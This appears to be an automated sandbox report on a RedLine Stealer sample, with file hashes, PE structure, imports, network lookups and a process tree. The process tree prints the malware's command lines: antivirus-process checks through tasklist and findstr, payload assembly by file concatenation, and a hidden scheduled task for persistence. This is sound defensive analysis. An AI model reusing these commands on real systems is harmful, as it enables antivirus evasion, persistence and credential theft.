                                                      Preview:..}...L$4.lL....D$.P.D$dWP.mh......D$`.L$4P..I..P.L$...w..j.S.D$.PV.Ls......L$..0}...L$4..L....D$0P.D$dWP..h......D$`.L$4P.{I..P.L$..v..j.S.D$.PV..r......L$...|...L$4..K...!.M.h..I..~...T$\j.j....H....*..._^3.[..]...U.......S.].VW.M..{..u..L,I....C..p.....{...F..8.C..0....{...F.......W...&x..Y<.u..M.......P. ~...8hL,I.W..e..YY.M...u.h..K...h..I...}...U.j.j....H......_^3.[..]...U.........SV3.W....$.....L$..|$...$......$......@...L$(..@...]..{..u..C..H...~....t..D$....3.L$..C..0....{...N..@.K...:........................C..0....z...v..L$..6J...L,I..L$.V......u2......P.L$...J..V.L$..lF...C..0...z...v..L$..4E...C..p....~z...v..L$,..I...L$(..}....t/.D$,.L$(HP.(C..f.8\t..u.....z..3..F.............C..p....)z...V..L$.3.S.t$...i..YY.........@j.........$.....v....t@j.........$.....iv....t(3.SP...H....A*...u....Iz...F............L$H.y>...L$h.p>...L$X.g>...L$8.^>...C..p....y...N..D$8P.D$.P.D$`P.T$t.H-......L$.3.P.)B..3.f9.u-Q.L$<..B..3.f9.u.h.K..L$...D..hL.K..L$<..D...D$hP.L$,.zH...D
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:PDP-11 overlaid pure executable
                                                      Category:dropped
                                                      Size (bytes):57344
                                                      Entropy (8bit):6.4803376957108165
                                                      Encrypted:false
                                                      SSDEEP:1536:w6CV21YEsmnq7Cv/+/Coc5m+4Xf8O468j:RCV26MqgQTc5F4464
                                                      MD5:182725BEF221C25182AC7BFC696D4988
                                                      SHA1:A33E850035CF57F7695A1208A8537828AFAFDD9A
                                                      SHA-256:8B0E03B1C91969FE83557C67FE53642342DB330F54C4013B7F85887727216B95
                                                      SHA-512:74CFB27D0845312FCE64ACDCFB9061F29E522302985C2210F407ED49CB74569D7ECA3BD48803F12594EA2F5437A92DB4446E3E48398E029D609EDE949CF39D03
                                                      Malicious:false
                                                      Preview:............!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K..
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):6.383436126011295
                                                      Encrypted:false
                                                      SSDEEP:768:NM4INduPbOUGM4INduPbOU+aI4kSmEusWjcd+DvFh:NMBNfMBNB+usWjcdGh
                                                      MD5:9FA394C105316800F804210742E01305
                                                      SHA1:190F535AC7E60C05E5DD62F5938FC818A1D761FC
                                                      SHA-256:AEFB22763D813EE35E899D012F434EDEBB3BC91601443E5912BA96F91C07B803
                                                      SHA-512:309E41BE9F66CA9C15FE46A80FE389E9D2F866CD4DB0DAB386D7E36D7F462FA06C978A62B25CF5D473F031D892820D6C4C788527E43E1EBF20C7CEDE59B6BA96
                                                      Malicious:false
                                                      Preview:..8CX......<.1...".?.'...;.<..&.b.?.,.kg..<.!.J...?.eT1..<..1y".?..z....<....F#.?V....a.<.$..lc.?....x..<..nu...?c.v5...<......?0...N..<....#.?...".$.<.b.m.d.?.g.Q...<.|.a7..?.....<.a..c.?.0.H_..<....$.?]U. ?..<.8.U.d.?|}}.?.<.5...?~+.....<.... .?)0>.B..<..'HR%.?....I&.<.^:.e.?>!....<.sl....?e.cb~q.<.....?r.....<.F..(&.?Z..n...<.'..`f.?4..7j..<.....?+i...U.<..oX..?F...K;.<.....'.?Yh....<.4lkQg.?.;+.U..<.3.....?...m8.<...&..?....<..S..(.?..Y.=.t<.:@.Xh.?,.n@4`.<...$...?.......<..n...?..9...<....-).?.\.....<...wi.?....=.<.R.%..?.f..@..<.*.B..?a...w..<.G..^*.?.m(.<..<..2;.j.?...P.E.<.......?<./....<.:..T.?Ft.....<....+.?N.ibzP.<.....l.?.. %X.<.a..Y..?]@._}.<..nL..?....G..<...1.-.?a....(.<.U..lm.?iT..?..<...*..?V..*...<.w7H-.?...X[F.<...+...?X. .kn.<.E...n.?.T.(.+.<...U[..?......<.'...?ju!4...<....-0.?.......<.Q..p.?.....<.......?....{..<...qw.?_W....<..C..1.?'......<.I..\r.?..D..c<.s.>..?......<.w*.I.?...n'$.<..2.3.?z....7.<.[..>t.?.V-A
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.946869592865797
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File size:919'502 bytes
                                                      MD5:284bba6223d9215b7b1f9b99480ad2cd
                                                      SHA1:5fd4f669024dce37ae01d3976d247d599c5e7f8e
                                                      SHA256:f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b01582d140d17d8131f658d
                                                      SHA512:801ca37178c4b4cb658613a206791cba597e11f96a80c682a13cf147d3e0e79777b501ecbf215dc170770a7c87287554072dcd5ed05966a8208e2ff6a9172177
                                                      SSDEEP:24576:KwqZ/xSjbuxymLA6NTTNTob8bsYdcA21W:lOBxn3pTJWY2A2
                                                      TLSH:E51523808FFCC13DD2FA0BB361F648560EB6E7A755B8050A16489A7DBF357110E39E4A
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                      Icon Hash:1edce8f8d4c6c8f0
                                                      Entrypoint:0x403883
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                      Signature Valid:false
                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 20/03/2024 15:23:35 21/03/2026 15:23:35
                                                      Subject Chain
                                                      • CN=YANDEX LLC, O=YANDEX LLC, STREET="Lev Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                                      Version:3
                                                      Thumbprint MD5:9906E73CDAF5570B04FDE09A4BCB74A9
                                                      Thumbprint SHA-1:46E2F09D295573BB09DACC6B209B142C244A30D6
                                                      Thumbprint SHA-256:6E4B1A3C72EF08F8311CF4F596DE8CCA679D06C51A87E1C5714F8DECB84BCB37
                                                      Serial:6F126C9CC287DE458CE890F6
                                                      Instruction
                                                      sub esp, 000002D4h
                                                      push ebx
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      push 00000020h
                                                      xor ebp, ebp
                                                      pop esi
                                                      mov dword ptr [esp+18h], ebp
                                                      mov dword ptr [esp+10h], 00409268h
                                                      mov dword ptr [esp+14h], ebp
                                                      call dword ptr [00408030h]
                                                      push 00008001h
                                                      call dword ptr [004080B4h]
                                                      push ebp
                                                      call dword ptr [004082C0h]
                                                      push 00000008h
                                                      mov dword ptr [00472EB8h], eax
                                                      call 00007FB8804FDF8Bh
                                                      push ebp
                                                      push 000002B4h
                                                      mov dword ptr [00472DD0h], eax
                                                      lea eax, dword ptr [esp+38h]
                                                      push eax
                                                      push ebp
                                                      push 00409264h
                                                      call dword ptr [00408184h]
                                                      push 0040924Ch
                                                      push 0046ADC0h
                                                      call 00007FB8804FDC6Dh
                                                      call dword ptr [004080B0h]
                                                      push eax
                                                      mov edi, 004C30A0h
                                                      push edi
                                                      call 00007FB8804FDC5Bh
                                                      push ebp
                                                      call dword ptr [00408134h]
                                                      cmp word ptr [004C30A0h], 0022h
                                                      mov dword ptr [00472DD8h], eax
                                                      mov eax, edi
                                                      jne 00007FB8804FB55Ah
                                                      push 00000022h
                                                      pop esi
                                                      mov eax, 004C30A2h
                                                      push esi
                                                      push eax
                                                      call 00007FB8804FD931h
                                                      push eax
                                                      call dword ptr [00408260h]
                                                      mov esi, eax
                                                      mov dword ptr [esp+1Ch], esi
                                                      jmp 00007FB8804FB5E3h
                                                      push 00000020h
                                                      pop ebx
                                                      cmp ax, bx
                                                      jne 00007FB8804FB55Ah
                                                      add esi, 02h
                                                      cmp word ptr [esi], bx
                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ C ] VS2010 SP1 build 40219
                                                      • [RES] VS2010 SP1 build 40219
                                                      • [LNK] VS2010 SP1 build 40219
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x4fe0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xddc960x2b38.ndata
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xf40000x4fe00x50003f4adff8ee3a5ffd71854529bd07d44fFalse0.394677734375data3.9010989150943747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xf90000xf320x10002d0fc4dd07f898b869ecdfdd0c2f4028False0.245849609375data2.173648661395905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xf42200x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.21663954434499594
                                                      RT_ICON0xf68880x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.2900728597449909
                                                      RT_ICON0xf79b00xc30PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003525641025641
                                                      RT_ICON0xf85e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.35904255319148937
                                                      RT_DIALOG0xf8a480x100dataEnglishUnited States0.5234375
                                                      RT_DIALOG0xf8b480x11cdataEnglishUnited States0.6056338028169014
                                                      RT_DIALOG0xf8c680x60dataEnglishUnited States0.7291666666666666
                                                      RT_GROUP_ICON0xf8cc80x3edataEnglishUnited States0.8064516129032258
                                                      RT_MANIFEST0xf8d080x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                      DLLImport
                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States
                                                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                      2024-07-26T21:12:55.216657+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971552.165.165.26192.168.2.5
                                                      2024-07-26T21:12:17.026947+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970752.165.165.26192.168.2.5
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 26, 2024 21:12:03.748888016 CEST6375653192.168.2.51.1.1.1
                                                      Jul 26, 2024 21:12:03.758347034 CEST53637561.1.1.1192.168.2.5
                                                      Jul 26, 2024 21:12:10.111047983 CEST5110553192.168.2.51.1.1.1
                                                      Jul 26, 2024 21:12:10.140145063 CEST53511051.1.1.1192.168.2.5
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jul 26, 2024 21:12:03.748888016 CEST192.168.2.51.1.1.10xc702Standard query (0)RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjPA (IP address)IN (0x0001)false
                                                      Jul 26, 2024 21:12:10.111047983 CEST192.168.2.51.1.1.10x59eeStandard query (0)RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjPA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jul 26, 2024 21:12:03.758347034 CEST1.1.1.1192.168.2.50xc702Name error (3)RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjPnonenoneA (IP address)IN (0x0001)false
                                                      Jul 26, 2024 21:12:10.140145063 CEST1.1.1.1192.168.2.50x59eeName error (3)RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjPnonenoneA (IP address)IN (0x0001)false

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:15:11:55
                                                      Start date:26/07/2024
                                                      Path:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"
                                                      Imagebase:0x400000
                                                      File size:919'502 bytes
                                                      MD5 hash:284BBA6223D9215B7B1F9B99480AD2CD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:15:11:58
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit
                                                      Imagebase:0x790000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:15:11:58
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:15:12:00
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:tasklist
                                                      Imagebase:0x120000
                                                      File size:79'360 bytes
                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:15:12:00
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                      Imagebase:0x950000
                                                      File size:29'696 bytes
                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:15:12:00
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:tasklist
                                                      Imagebase:0x120000
                                                      File size:79'360 bytes
                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:15:12:00
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                      Imagebase:0x950000
                                                      File size:29'696 bytes
                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:15:12:01
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd /c md 723582
                                                      Imagebase:0x790000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:15:12:01
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:findstr /V "wagemissileaffiliatesgreeting" Fisting
                                                      Imagebase:0x950000
                                                      File size:29'696 bytes
                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:15:12:01
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd /c copy /b Restriction + Manager + Screw + Anchor 723582\r
                                                      Imagebase:0x790000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:15:12:01
                                                      Start date:26/07/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\723582\Flash.pif
                                                      Wow64 process (32bit):true
                                                      Commandline:723582\Flash.pif 723582\r
                                                      Imagebase:0x9d0000
                                                      File size:893'608 bytes
                                                      MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.3256409691.000000000141A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.3256254115.0000000001350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000003.3249041675.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000003.3249083801.000000000139B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.3256579902.00000000014CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000003.3248898877.0000000001351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000003.3248832355.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000003.3248740085.000000000141B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000003.3248696366.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 7%, ReversingLabs
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:12
                                                      Start time:15:12:01
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 15
                                                      Imagebase:0xcd0000
                                                      File size:25'088 bytes
                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:15:12:02
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST
                                                      Imagebase:0x950000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:15:12:03
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:15:12:04
                                                      Start date:26/07/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js"
                                                      Imagebase:0x7ff7e9460000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:15:12:04
                                                      Start date:26/07/2024
                                                      Path:C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif" "C:\Users\user\AppData\Local\EduTech Dynamics\L"
                                                      Imagebase:0x180000
                                                      File size:893'608 bytes
                                                      MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 7%, ReversingLabs
                                                      Has exited:false

                                                      Target ID:20
                                                      Start time:15:14:00
                                                      Start date:26/07/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe
                                                      Wow64 process (32bit):
                                                      Commandline:C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe
                                                      Imagebase:
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
